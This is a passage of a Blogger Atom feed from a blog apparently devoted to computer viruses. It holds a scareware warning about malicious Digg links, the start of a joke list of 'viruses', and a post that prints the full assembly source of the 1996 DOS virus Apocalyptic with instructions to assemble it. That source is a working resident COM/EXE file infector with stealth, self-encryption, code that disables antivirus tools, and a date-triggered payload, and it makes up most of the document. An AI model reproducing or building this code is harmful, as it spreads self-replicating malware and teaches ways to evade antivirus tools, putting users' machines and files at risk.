href='http://creatingcomputervirus.blogspot.com/2009/02/mysterious-new-computer-virus-may-be.html' title='Mysterious New Computer Virus May Be &apos;Sleeper&apos; Agent'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-3089891242882987011</id><published>2009-02-17T00:39:00.000-08:00</published><updated>2009-02-17T03:53:59.532-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='malware'/><category scheme='http://www.blogger.com/atom/ns#' term='digg attack'/><title type='text'>Beware of Hackers</title><content type='html'>Are you sure that you are safe while browsing the internet or while downloading anything from the internet. The anti-malware software you are downloading may be a malware or may contain malware. The hackers are now using the popular names (names of the celebrity)for making the people to download the malware or the spyware made by them. One such example is in the popular news aggregator Digg. there are reports saying that there were 52 accounts posting news stories or comments with malicious URLs. Many of these accounts purport to be news items about celebrities, including actors Christian Bale and Alyssa Milano, singer Britney Spears and Paris Hilton. They contain a link to a video about the celebrity that takes victims to the sites that downloads the Adware/VideoPlay fake anti-malware, or scareware, package when the user clicks on it. Digg reported that it have terminated more than 300 malware accounts.The Digg attacks download the MS Antispyware 2009 scareware package to victims' PCs. This pretends to scan the PCs, then tells that the computer is infected with malware. It then asks the victim to pay money through the credit card for removing the malware. The malware creators also owns blogs. They post real and fake stories about the celebrities for getting the attention of the viewer quickly. So be care in using internet and while downloading from the internet. Download only from the trusted source.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-3089891242882987011?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/3089891242882987011/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/02/beware-of-hackers.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/3089891242882987011'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/3089891242882987011'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/02/beware-of-hackers.html' title='Beware of Hackers'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-6723775757789764472</id><published>2009-02-16T03:01:00.000-08:00</published><updated>2009-02-16T08:01:57.260-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Apocalyptic'/><category scheme='http://www.blogger.com/atom/ns#' term='virus code'/><category scheme='http://www.blogger.com/atom/ns#' term='source code'/><title type='text'>Apocalyptic</title><content type='html'>This post is about an old virus Apocalyptic. It will be detected by almost all the antivirus softwares. It appeared in 1996.&lt;br /&gt;&lt;br /&gt;The important characteristics of this virus is:&lt;br /&gt;&lt;br /&gt;-TSR appending Com/Exe infector&lt;br /&gt;-Has a routine to encrypt and another to decrypt ( ror+add+xor )&lt;br /&gt;-Stealth ( 11h/12h/4eh/4fh/5700h )&lt;br /&gt;-Deactivates Tbdriver when going into mem and when infecting&lt;br /&gt;-Makes the int 3h point to the int21h on infection&lt;br /&gt;-Fools f-prot's 'stealth detection'&lt;br /&gt;-Non-detectable ( in 2nd generation ) by Tbav 7.05, F-prot 2.23c, Scan,&lt;br /&gt;-Avp and else. TbClean doesn't clean it ( it gets lost with the Z Mcb&lt;br /&gt;-searching loop,... really that product is a shit )&lt;br /&gt;-Payload: On 26th of July it shows all file with size 029Ah ( 666 )&lt;br /&gt;&lt;br /&gt;To assemble the virus code, use:&lt;br /&gt;&lt;br /&gt;   Tasm virus.asm&lt;br /&gt;   Tlink virus.obj&lt;br /&gt;Please do not think that I am promoting the creation of virus. The details I have given is available on the internet for the public. The source code of Apocalyptic is given below:&lt;br /&gt;&lt;br /&gt;.286&lt;br /&gt;HOSTSEG segment BYTE&lt;br /&gt;ASSUME CS:HOSTSEG, SS:CODIGO&lt;br /&gt; &lt;br /&gt;Host:&lt;br /&gt;    mov ax,4c00h&lt;br /&gt;    int 21h&lt;br /&gt; &lt;br /&gt;ends&lt;br /&gt; &lt;br /&gt;CODIGO  segment PARA&lt;br /&gt;ASSUME  CS:CODIGO, DS:CODIGO, SS:CODIGO&lt;br /&gt; &lt;br /&gt;virus_size      equ virus_end-virus_start&lt;br /&gt;encrypt_size    equ encrypt_end-encrypt_start&lt;br /&gt; &lt;br /&gt;virus_start     label byte&lt;br /&gt; &lt;br /&gt;org     0h&lt;br /&gt; &lt;br /&gt;Letsrock:&lt;br /&gt;                call    delta                   ; Entry for Com/Exe&lt;br /&gt;delta:&lt;br /&gt;                mov     si,sp                   ; �-offset&lt;br /&gt;                mov     bp,word ptr ss:[si]&lt;br /&gt;                sub     bp,offset delta&lt;br /&gt;                push    es ax ds&lt;br /&gt; &lt;br /&gt;                push    cs&lt;br /&gt;                pop     ds&lt;br /&gt;                call    tomacha                 ; I don't call encryption&lt;br /&gt;                                                ;on first generation&lt;br /&gt; &lt;br /&gt;Encrypt_start   label   byte&lt;br /&gt; &lt;br /&gt;;***************************************************************************&lt;br /&gt;;                                RESIDENCE&lt;br /&gt;;***************************************************************************&lt;br /&gt; &lt;br /&gt; &lt;br /&gt;goon:&lt;br /&gt;                push    es&lt;br /&gt;                call    tbdriver                ; Deactivate TbDriver&lt;br /&gt; &lt;br /&gt;                mov     ah,52h                  ; Pick list of lists&lt;br /&gt;                int     21h&lt;br /&gt;                mov     si,es:[bx-2]            ; First MCB&lt;br /&gt;                mov     es,si&lt;br /&gt; &lt;br /&gt;Mcb_Loop:&lt;br /&gt;                cmp     byte ptr es:[0],'Z'     ; I search last Mcb.&lt;br /&gt;                je      got_last&lt;br /&gt;cont:           add     si,es:[3]&lt;br /&gt;                inc     si&lt;br /&gt;                mov     es,si&lt;br /&gt;                jmp     Mcb_Loop&lt;br /&gt; &lt;br /&gt;got_last:&lt;br /&gt;                pop     dx&lt;br /&gt;                cmp     word ptr es:[1],0h      ; Is it free ?&lt;br /&gt;                je      go_on&lt;br /&gt;                cmp     word ptr es:[1],dx      ; Or with active Psp ?&lt;br /&gt;                jne     exit&lt;br /&gt;go_on:&lt;br /&gt;                cmp     word ptr es:[3],((virus_size+15)/16)+1&lt;br /&gt;                jb      exit                    ; Is there space for me ?&lt;br /&gt; &lt;br /&gt;                push    es                      ; If there is, I get resident&lt;br /&gt;                pop     ds&lt;br /&gt;                mov     di,es&lt;br /&gt;                add     di,word ptr es:[3]      ; Residence stuff; nothing&lt;br /&gt;                sub     di,((virus_size+15)/16)      ;special&lt;br /&gt;                push    di&lt;br /&gt;                mov     es,di&lt;br /&gt;                xor     di,di&lt;br /&gt;                xor     si,si&lt;br /&gt;                mov     cx,8&lt;br /&gt;                rep     movsw&lt;br /&gt; &lt;br /&gt;                pop     di&lt;br /&gt;                inc     di&lt;br /&gt;                mov     word ptr es:[3],((virus_size+15)/16)+1&lt;br /&gt;                mov     word ptr es:[1],di&lt;br /&gt; &lt;br /&gt;                mov     byte ptr ds:[0],'M'&lt;br /&gt;                sub     word ptr ds:[3],((virus_size+15)/16)+1&lt;br /&gt;                mov     di,5&lt;br /&gt;                mov     cx,12&lt;br /&gt;                xor     al,al&lt;br /&gt;                rep     stosb&lt;br /&gt; &lt;br /&gt;                push    es cs&lt;br /&gt;                pop     ds ax&lt;br /&gt;                inc     ax&lt;br /&gt;                push    ax&lt;br /&gt;                mov     es,ax&lt;br /&gt;                xor     di,di&lt;br /&gt;                mov     si,bp&lt;br /&gt;                mov     cx,(virus_size)&lt;br /&gt;                rep     movsb&lt;br /&gt; &lt;br /&gt;                mov     ax,3521h&lt;br /&gt;                int     21h&lt;br /&gt;                pop     ds&lt;br /&gt;                mov     ds:word ptr [int21h],bx&lt;br /&gt;                mov     ds:word ptr [int21h+2],es&lt;br /&gt;                mov     ah,25h&lt;br /&gt;                lea     dx,main_center&lt;br /&gt;                int     21h&lt;br /&gt; &lt;br /&gt;;***************************************************************************&lt;br /&gt;;                              RETURN TO HOST&lt;br /&gt;;***************************************************************************&lt;br /&gt; &lt;br /&gt;exit:&lt;br /&gt;                pop     ds ax es&lt;br /&gt; &lt;br /&gt;                dec     byte ptr [flag+bp]              ; Was it a Com ?&lt;br /&gt;                jz      era_un_com&lt;br /&gt; &lt;br /&gt;                mov     si,ds                   ; Recover stack&lt;br /&gt;                add     si,cs:word ptr [ss_sp+bp]&lt;br /&gt;                add     si,10h&lt;br /&gt;                cli&lt;br /&gt;                mov     ss,si&lt;br /&gt;                mov     sp,cs:word ptr [ss_sp+bp+2]&lt;br /&gt;                sti&lt;br /&gt; &lt;br /&gt;                mov     si,ds                   ; Recover CS:IP&lt;br /&gt;                add     si,cs:word ptr [cs_ip+bp+2]&lt;br /&gt;                add     si,10h&lt;br /&gt;                push    si&lt;br /&gt;                push    cs:word ptr [cs_ip+bp]&lt;br /&gt; &lt;br /&gt;                retf                            ; Return to host&lt;br /&gt; &lt;br /&gt;era_un_com:&lt;br /&gt;                mov     di,100h                 ; If it's a Com, I make&lt;br /&gt;                push    di                      ;it to return&lt;br /&gt;                lea     si,bp+ss_sp&lt;br /&gt;                movsw&lt;br /&gt;                movsb&lt;br /&gt;                ret&lt;br /&gt; &lt;br /&gt;condiciones:&lt;br /&gt;                push    cx dx                   ; Payload trigger&lt;br /&gt;                mov     ah,02ah                 ; Activates on 26th july&lt;br /&gt;                int     21h&lt;br /&gt;                cmp     dx,071Ah&lt;br /&gt;                pop     dx cx&lt;br /&gt;                jnz     nain&lt;br /&gt;                stc&lt;br /&gt;                ret&lt;br /&gt;nain:&lt;br /&gt;                clc&lt;br /&gt;                ret&lt;br /&gt; &lt;br /&gt;;***************************************************************************&lt;br /&gt;;                                TBDRIVER&lt;br /&gt;;***************************************************************************&lt;br /&gt; &lt;br /&gt;Tbdriver:&lt;br /&gt;                xor     ax,ax                   ; Annulates TBdriver,...&lt;br /&gt;                mov     es,ax                   ;really, this Av is a&lt;br /&gt;                les     bx,es:[0084h]           ;megashit.&lt;br /&gt;                cmp     byte ptr es:[bx+2],0eah&lt;br /&gt;                jnz     volvamos&lt;br /&gt;                push    word ptr es:[bx+3]&lt;br /&gt;                push    word ptr es:[bx+5]&lt;br /&gt;                mov     es,ax&lt;br /&gt;                pop     word ptr es:[0086h]&lt;br /&gt;                pop     word ptr es:[0084h]&lt;br /&gt;volvamos:       ret&lt;br /&gt; &lt;br /&gt;;***************************************************************************&lt;br /&gt;;                            STEALTH 05700h&lt;br /&gt;;***************************************************************************&lt;br /&gt; &lt;br /&gt;Stealth_tiempo:&lt;br /&gt;                pushf&lt;br /&gt;                call    dword ptr cs:[Int21h]   ; Calls Int21h&lt;br /&gt;                push    cx&lt;br /&gt;                and     cl,01fh&lt;br /&gt;                xor     cl,01fh&lt;br /&gt;                pop     cx&lt;br /&gt;                jnz     nada&lt;br /&gt;                or      cl,01fh                 ; Changes seconds&lt;br /&gt;nada:&lt;br /&gt;                retf    2&lt;br /&gt; &lt;br /&gt;;****************************************************************************&lt;br /&gt;;                               FCB STEALTH&lt;br /&gt;;****************************************************************************&lt;br /&gt; &lt;br /&gt;FCB_Stealth:&lt;br /&gt; &lt;br /&gt;                pushf                           ; Stealth of 11h/12h, by&lt;br /&gt;                call    dword ptr cs:[Int21h]   ;FCBs&lt;br /&gt;                test    al,al&lt;br /&gt;                jnz     sin_stealth&lt;br /&gt; &lt;br /&gt;                push    ax bx es&lt;br /&gt; &lt;br /&gt;                mov     ah,51h&lt;br /&gt;                int     21h&lt;br /&gt;                mov     es,bx&lt;br /&gt;                cmp     bx,es:[16h]&lt;br /&gt;                jnz     No_infectado&lt;br /&gt; &lt;br /&gt;                mov     bx,dx&lt;br /&gt;                mov     al,[bx]&lt;br /&gt;                push    ax&lt;br /&gt;                mov     ah,2fh&lt;br /&gt;                int     21h&lt;br /&gt;                pop     ax&lt;br /&gt;                inc     al&lt;br /&gt;                jnz     Normal_FCB&lt;br /&gt;                add     bx,7h&lt;br /&gt;Normal_FCB:&lt;br /&gt;                mov     al,es:[bx+17h]&lt;br /&gt;                and     al,1fh&lt;br /&gt;                xor     al,1fh&lt;br /&gt;                jnz     No_infectado&lt;br /&gt; &lt;br /&gt;                sub     word ptr es:[bx+1dh],Virus_size ; Old lenght of&lt;br /&gt;                sbb     word ptr es:[bx+1fh],0          ;file and "normal"&lt;br /&gt;                and     byte ptr es:[bx+17h],0F1h       ;seconds&lt;br /&gt; &lt;br /&gt;No_infectado:&lt;br /&gt;                call    condiciones&lt;br /&gt;                jnc     sin_nada&lt;br /&gt; &lt;br /&gt;                mov     word ptr es:[bx+1dh],029Ah      ; Virus's payload&lt;br /&gt;                mov     word ptr es:[bx+1fh],0h&lt;br /&gt; &lt;br /&gt;sin_nada:&lt;br /&gt;                pop     es bx ax&lt;br /&gt;Sin_stealth:    retf    2&lt;br /&gt; &lt;br /&gt;;****************************************************************************&lt;br /&gt;;                                INT 21h&lt;br /&gt;;****************************************************************************&lt;br /&gt; &lt;br /&gt;main_center:                                ; The main center !&lt;br /&gt;                cmp     ax,5700h&lt;br /&gt;                jz      stealth_tiempo&lt;br /&gt;                cmp     ah,11h&lt;br /&gt;                jz      fcb_stealth&lt;br /&gt;                cmp     ah,12h&lt;br /&gt;                jz      fcb_stealth&lt;br /&gt;                cmp     ah,4eh&lt;br /&gt;                jz      handle_stealth&lt;br /&gt;                cmp     ah,4fh&lt;br /&gt;                jz      handle_stealth&lt;br /&gt;                cmp     ah,4bh&lt;br /&gt;                je      ejecutar&lt;br /&gt;                jmp     saltito&lt;br /&gt; &lt;br /&gt;;****************************************************************************&lt;br /&gt;;                             HANDLE STEALTH&lt;br /&gt;;****************************************************************************&lt;br /&gt; &lt;br /&gt;handle_stealth:&lt;br /&gt; &lt;br /&gt;                pushf                           ; Handle stealth, functions&lt;br /&gt;                call    dword ptr cs:[Int21h]   ;4eh/4fh&lt;br /&gt;                jc      adios_handle&lt;br /&gt; &lt;br /&gt;                pushf&lt;br /&gt;                push    ax es bx cx&lt;br /&gt; &lt;br /&gt;anti_antivirus:&lt;br /&gt; &lt;br /&gt;                mov     ah,62h&lt;br /&gt;                int     21h&lt;br /&gt; &lt;br /&gt;                mov     es,bx                   ; Is it F-prot ?&lt;br /&gt;                mov     es,word ptr es:[2ch]&lt;br /&gt;                xor     bx,bx&lt;br /&gt;                mov     cx,100h&lt;br /&gt;fpr:&lt;br /&gt;                cmp     word ptr es:[bx],'-F'&lt;br /&gt;                jz      sin_infectar            ; Si lo es, pasamos de hacer&lt;br /&gt;                inc     bx                      ;el stealth&lt;br /&gt;                loop    fpr&lt;br /&gt; &lt;br /&gt;                mov     ah,2fh&lt;br /&gt;                int     21h&lt;br /&gt; &lt;br /&gt;                mov     al,es:[bx+16h]&lt;br /&gt;                and     al,1fh&lt;br /&gt;                xor     al,1fh&lt;br /&gt;                jnz     sin_infectar&lt;br /&gt; &lt;br /&gt;                sub     word ptr es:[bx+1ah],Virus_size ; Subs virus size&lt;br /&gt;                sbb     word ptr es:[bx+1ch],0          ;and places coherent&lt;br /&gt;                and     byte ptr es:[bx+16h],0F1h       ;seconds&lt;br /&gt; &lt;br /&gt;sin_infectar:&lt;br /&gt;                call    condiciones&lt;br /&gt;                jnc     no_payload&lt;br /&gt; &lt;br /&gt;                mov     word ptr es:[bx+1ah],029Ah      ; payload&lt;br /&gt;                mov     word ptr es:[bx+1ch],0h&lt;br /&gt;no_payload:&lt;br /&gt;                pop     cx bx es ax&lt;br /&gt;                popf&lt;br /&gt;adios_handle:&lt;br /&gt;                retf    2&lt;br /&gt; &lt;br /&gt;;****************************************************************************&lt;br /&gt;;                             EXE INFECTION&lt;br /&gt;;****************************************************************************&lt;br /&gt; &lt;br /&gt;ejecutar:&lt;br /&gt;                pushf&lt;br /&gt;                push    ax bx cx dx si di ds es bp&lt;br /&gt; &lt;br /&gt;                mov     di,ds&lt;br /&gt;                mov     si,dx&lt;br /&gt; &lt;br /&gt;                call    tbdriver                ; deactivates TbDriver&lt;br /&gt; &lt;br /&gt;                mov     ax,3503h                ; Int 3h points to the&lt;br /&gt;                int     21h                     ;int 21h: less size and we&lt;br /&gt;                push    cs                      ;fuck'em a bit&lt;br /&gt;                pop     ds&lt;br /&gt;                mov     ah,25h&lt;br /&gt;                lea     dx,saltito&lt;br /&gt;                int     21h&lt;br /&gt;                push    es bx ax&lt;br /&gt; &lt;br /&gt;                mov     ax,3524h                ; We handle int 24h&lt;br /&gt;                int     3h&lt;br /&gt;                mov     ah,25h&lt;br /&gt;                lea     dx,int24h&lt;br /&gt;                int     3h&lt;br /&gt;                push    es bx ax&lt;br /&gt; &lt;br /&gt;                mov     ds,di&lt;br /&gt;                mov     dx,si&lt;br /&gt; &lt;br /&gt;Noloes:&lt;br /&gt;                mov     ax,4300h                ; Saves and clears file&lt;br /&gt;                int     3h                      ;attributes&lt;br /&gt;                mov     ax,4301h&lt;br /&gt;                push    ax cx dx&lt;br /&gt;                xor     cx,cx&lt;br /&gt;                int     3h&lt;br /&gt; &lt;br /&gt;vamos_a_ver_si_exe:&lt;br /&gt; &lt;br /&gt;                mov     byte ptr [flag],00h&lt;br /&gt;                mov     ax,3d02h                ; Opens file&lt;br /&gt;                int     3h&lt;br /&gt;                jc      we_close&lt;br /&gt; &lt;br /&gt;infect:         xchg    ax,bx&lt;br /&gt; &lt;br /&gt;                push    cs&lt;br /&gt;                pop     ds&lt;br /&gt;                mov     ah,3fh                  ; Reads header&lt;br /&gt;                mov     cx,01ch&lt;br /&gt;                lea     dx,cabecera&lt;br /&gt;                int     3h&lt;br /&gt; &lt;br /&gt;                mov     al,byte ptr [cabecera]  ; Makes comprobations&lt;br /&gt;                add     al,byte ptr [cabecera+1]&lt;br /&gt;                cmp     al,'M'+'Z'&lt;br /&gt;                jnz     go_close&lt;br /&gt;                cmp     word ptr [cabecera+18h],40h&lt;br /&gt;                jz      go_close&lt;br /&gt;                cmp     word ptr [cabecera+1ah],0&lt;br /&gt;                jnz     go_close                ; If it's all right, goes on&lt;br /&gt;                jmp     conti&lt;br /&gt; &lt;br /&gt;go_close:&lt;br /&gt;                mov     ds,di&lt;br /&gt;                mov     dx,si&lt;br /&gt; &lt;br /&gt;buscar_final:   cmp     byte ptr ds:[si],0      ; Searches end in ds:si&lt;br /&gt;                je      chequeo&lt;br /&gt;                inc     si&lt;br /&gt;                jmp     buscar_final&lt;br /&gt; &lt;br /&gt;chequeo:&lt;br /&gt;                push    cs                      ; Is it a  .COM ?&lt;br /&gt;                pop     es&lt;br /&gt;                lea     di,comtxt&lt;br /&gt;                sub     si,3&lt;br /&gt;                cmpsw&lt;br /&gt;                jne     we_close&lt;br /&gt;                jmp     infeccion_com&lt;br /&gt; &lt;br /&gt;we_close:&lt;br /&gt;                jmp     close&lt;br /&gt; &lt;br /&gt;conti:&lt;br /&gt;                mov     ax,5700h                ; Time/date of file&lt;br /&gt;                push    ax&lt;br /&gt;                int     3h&lt;br /&gt;                push    dx cx&lt;br /&gt;                and     cl,1fh&lt;br /&gt;                xor     cl,1fh&lt;br /&gt;                jz      close_ant&lt;br /&gt; &lt;br /&gt;                call    pointerant&lt;br /&gt;                cmp     ax,0200h&lt;br /&gt;                ja      contt&lt;br /&gt;noinz:          xor     si,si                       ; To avoid changing&lt;br /&gt;                jmp     close_ant                   ;date of non-infected&lt;br /&gt;                                                    ;files&lt;br /&gt;contt:&lt;br /&gt; &lt;br /&gt;                push    ax&lt;br /&gt;                pop     si&lt;br /&gt;                shr     ax,4&lt;br /&gt;                shl     dx,12&lt;br /&gt;                add     dx,ax&lt;br /&gt;                sub     dx,word ptr ds:cabecera+8&lt;br /&gt;                push    dx&lt;br /&gt; &lt;br /&gt;                and     si,0fh&lt;br /&gt;                push    si&lt;br /&gt;                call    copy&lt;br /&gt;                pop     si&lt;br /&gt; &lt;br /&gt;                pop     dx&lt;br /&gt;                mov     ds:word ptr [cs_ip+2],dx&lt;br /&gt;                inc     dx&lt;br /&gt;                mov     ds:word ptr [ss_sp],dx&lt;br /&gt;                mov     ds:word ptr [cs_ip],si&lt;br /&gt;                mov     ds:word ptr [ss_sp+2],((virus_size+100h-15h)/2)*2&lt;br /&gt; &lt;br /&gt;                call    pointerant&lt;br /&gt; &lt;br /&gt;                mov     cx,200h&lt;br /&gt;                div     cx&lt;br /&gt;                inc     ax&lt;br /&gt;                mov     word ptr [cabecera+2],dx&lt;br /&gt;                mov     word ptr [cabecera+4],ax&lt;br /&gt;                mov     word ptr [cabecera+0ah],((virus_size)/16)+10h&lt;br /&gt; &lt;br /&gt;                mov     ax,4200h&lt;br /&gt;                call    pointer&lt;br /&gt;                mov     cx,1ch&lt;br /&gt;                lea     dx,cabecera&lt;br /&gt;                push    cs&lt;br /&gt;                pop     ds&lt;br /&gt;                mov     ah,40h&lt;br /&gt;                int     3h&lt;br /&gt; &lt;br /&gt;close_ant:&lt;br /&gt;                pop     cx dx ax&lt;br /&gt;                or      si,si&lt;br /&gt;                je      close&lt;br /&gt;                inc     ax&lt;br /&gt;                or      cl,1fh&lt;br /&gt;                int     3h&lt;br /&gt; &lt;br /&gt; &lt;br /&gt;close:&lt;br /&gt; &lt;br /&gt;                pop     dx cx ax                    ; Attributes&lt;br /&gt;                inc     ax&lt;br /&gt;                int     21h&lt;br /&gt; &lt;br /&gt;                mov     ah,03eh&lt;br /&gt;                int     3h&lt;br /&gt; &lt;br /&gt;nahyuck:&lt;br /&gt; &lt;br /&gt;                pop     ax dx ds                ; Restores Int 24h y 3h&lt;br /&gt;                int     3h&lt;br /&gt;                pop     ax dx ds&lt;br /&gt;                int     3h&lt;br /&gt; &lt;br /&gt;                pop     bp es ds di si dx cx bx ax&lt;br /&gt;                popf&lt;br /&gt;                jmp     saltito&lt;br /&gt; &lt;br /&gt;Pointerant:&lt;br /&gt;                mov     ax,4202h&lt;br /&gt;Pointer:&lt;br /&gt;                xor     cx,cx&lt;br /&gt;                cwd&lt;br /&gt;                int     3h&lt;br /&gt;                ret&lt;br /&gt; &lt;br /&gt;;****************************************************************************&lt;br /&gt;;                             COM INFECTION&lt;br /&gt;;****************************************************************************&lt;br /&gt; &lt;br /&gt; &lt;br /&gt;infeccion_com:&lt;br /&gt; &lt;br /&gt;                mov     ax,3d02h                ; Open&lt;br /&gt;                int     3h&lt;br /&gt;                jc      close&lt;br /&gt;                xchg    bx,ax&lt;br /&gt; &lt;br /&gt;                push    cs&lt;br /&gt;                pop     ds&lt;br /&gt; &lt;br /&gt;                mov     byte ptr [flag],1h      ; To make the virus know it's&lt;br /&gt;                                                ;a com when restoring&lt;br /&gt;                mov     ax,5700h                ; Time/date&lt;br /&gt;                push    ax&lt;br /&gt;                int     3h&lt;br /&gt;                push    dx cx&lt;br /&gt;                and     cl,1fh&lt;br /&gt;                xor     cl,1fh&lt;br /&gt;                jz      close_ant&lt;br /&gt; &lt;br /&gt;quesiquevale:&lt;br /&gt;                mov     ah,3fh                  ; Reads beggining of file&lt;br /&gt;                mov     cx,3&lt;br /&gt;                lea     dx,ss_sp&lt;br /&gt;                int     3h&lt;br /&gt; &lt;br /&gt;                call    pointerant              ; Lenght check&lt;br /&gt;                cmp     ax,0200h&lt;br /&gt;                ja      puedes_seguir&lt;br /&gt;                cmp     ax,(0ffffh-virus_size-100h)&lt;br /&gt;                jna     puedes_seguir&lt;br /&gt;alnoin:         jmp     noinz&lt;br /&gt; &lt;br /&gt;puedes_seguir:&lt;br /&gt;                sub     ax,3&lt;br /&gt;                mov     word ptr [cabecera],ax&lt;br /&gt; &lt;br /&gt;                call    copy                    ; Appending&lt;br /&gt; &lt;br /&gt;                mov     ax,4200h&lt;br /&gt;                call    pointer&lt;br /&gt; &lt;br /&gt;                mov     ah,40h                  ; Jumping to code at&lt;br /&gt;                lea     dx,salt                 ;beggining&lt;br /&gt;                mov     cx,3h&lt;br /&gt;                int     3h&lt;br /&gt; &lt;br /&gt;                jmp     close_ant&lt;br /&gt; &lt;br /&gt;;****************************************************************************&lt;br /&gt;;                                  DATA&lt;br /&gt;;****************************************************************************&lt;br /&gt; &lt;br /&gt;autor:          db 'Apocalyptic by Wintermute/29A'&lt;br /&gt;comtxt:         db 'COM'&lt;br /&gt;flag:           db 0&lt;br /&gt;salt:           db 0e9h&lt;br /&gt;cabecera:       db 0eh dup (90h)&lt;br /&gt;SS_SP:          dw 0,offset virus_end+100h&lt;br /&gt;Checksum:       dw 0&lt;br /&gt;CS_IP:          dw offset host,0&lt;br /&gt;Cequis:         dw 0,0,0,0&lt;br /&gt; &lt;br /&gt;Encrypt_end     label   byte&lt;br /&gt; &lt;br /&gt;copy:&lt;br /&gt;                push    cs&lt;br /&gt;                pop     ds&lt;br /&gt;                xor     bp,bp                   ; Don't let bp fuck us&lt;br /&gt;                call    encryptant              ; Encrypts&lt;br /&gt;                mov     ah,40h                  ; Copies&lt;br /&gt;                mov     cx,virus_size&lt;br /&gt;                lea     dx,letsrock&lt;br /&gt;                int     3h&lt;br /&gt;                call    deencrypt               ; Deencrypts&lt;br /&gt;                ret&lt;br /&gt; &lt;br /&gt;;****************************************************************************&lt;br /&gt;;                           ENCRYPT ROUTINE&lt;br /&gt;;****************************************************************************&lt;br /&gt; &lt;br /&gt;encryptant:&lt;br /&gt;                lea     si,encrypt_end          ; Encrypts&lt;br /&gt;                mov     cx,encrypt_size&lt;br /&gt;enc_loop:       mov     dl,byte ptr [si]&lt;br /&gt;                sub     dl,2h&lt;br /&gt;                xor     dl,0f9h&lt;br /&gt;                ror     dl,4&lt;br /&gt;                mov     byte ptr [si],dl&lt;br /&gt;                dec     si&lt;br /&gt;                loop    enc_loop&lt;br /&gt;                ret&lt;br /&gt; &lt;br /&gt;deencrypt:&lt;br /&gt;                lea     si,encrypt_end+bp       ; Deencrypts&lt;br /&gt;                mov     cx,encrypt_size&lt;br /&gt;                mov     di,8&lt;br /&gt;encri:          mov     dl,byte ptr [si]&lt;br /&gt;                mov     al,dl&lt;br /&gt;                rol     dl,4&lt;br /&gt;                xor     dl,0f9h&lt;br /&gt;                add     dl,2h&lt;br /&gt;                mov     byte ptr [si],dl&lt;br /&gt;                dec     si&lt;br /&gt;                loop    encri&lt;br /&gt;                ret&lt;br /&gt; &lt;br /&gt;Int24h:         mov     al,3&lt;br /&gt;                ret&lt;br /&gt;Saltito:        db      0eah&lt;br /&gt;int21h:         dw 0,0&lt;br /&gt; &lt;br /&gt; &lt;br /&gt;virus_end       label byte&lt;br /&gt; &lt;br /&gt;tomacha:&lt;br /&gt;                mov     cs:word ptr encrypt_start-2+bp,deencrypt-encrypt_start&lt;br /&gt;                ret&lt;br /&gt;                        ; This is cause I don't like putting a stupid flag,&lt;br /&gt;                        ; this two commands won't be copied&lt;br /&gt; &lt;br /&gt;        CODIGO ends&lt;br /&gt;        END Letsrock&lt;br /&gt; &lt;br /&gt; VSTACK segment para STACK 'Stack'&lt;br /&gt; &lt;br /&gt;    db  100h dup (90h)&lt;br /&gt; &lt;br /&gt;ends&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-6723775757789764472?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/6723775757789764472/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/02/apocalyptic.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/6723775757789764472'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/6723775757789764472'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/02/apocalyptic.html' title='Apocalyptic'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-4312790012751732684</id><published>2009-02-15T00:39:00.000-08:00</published><updated>2009-02-15T00:47:32.894-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='new virus'/><category scheme='http://www.blogger.com/atom/ns#' term='new virus list'/><title type='text'>Some New Viruses</title><content type='html'>OPRAH WINFREY VIRUS:&lt;br /&gt;                    Your 200MB hard drive suddenly shrinks to 80MB, and then slowly expands back to 200MB.&lt;br /&gt;&lt;br /&gt;AT&amp;T VIRUS: &lt;br /&gt;            Every three minutes it tells you what great service you are getting.&lt;br /&gt;&lt;br /&gt;MCI VIRUS: &lt;br /&gt;            Every three minutes it reminds you that you're paying too much for the AT&amp;T virus.&lt;br /&gt;&lt;br /&gt;PAUL REVERE VIRUS:&lt;br /&gt;                   This revolutionary virus does not horse around. It warns you of impending hard disk attack---once if by LAN, twice if by C:&gt;.&lt;br /&gt;&lt;br 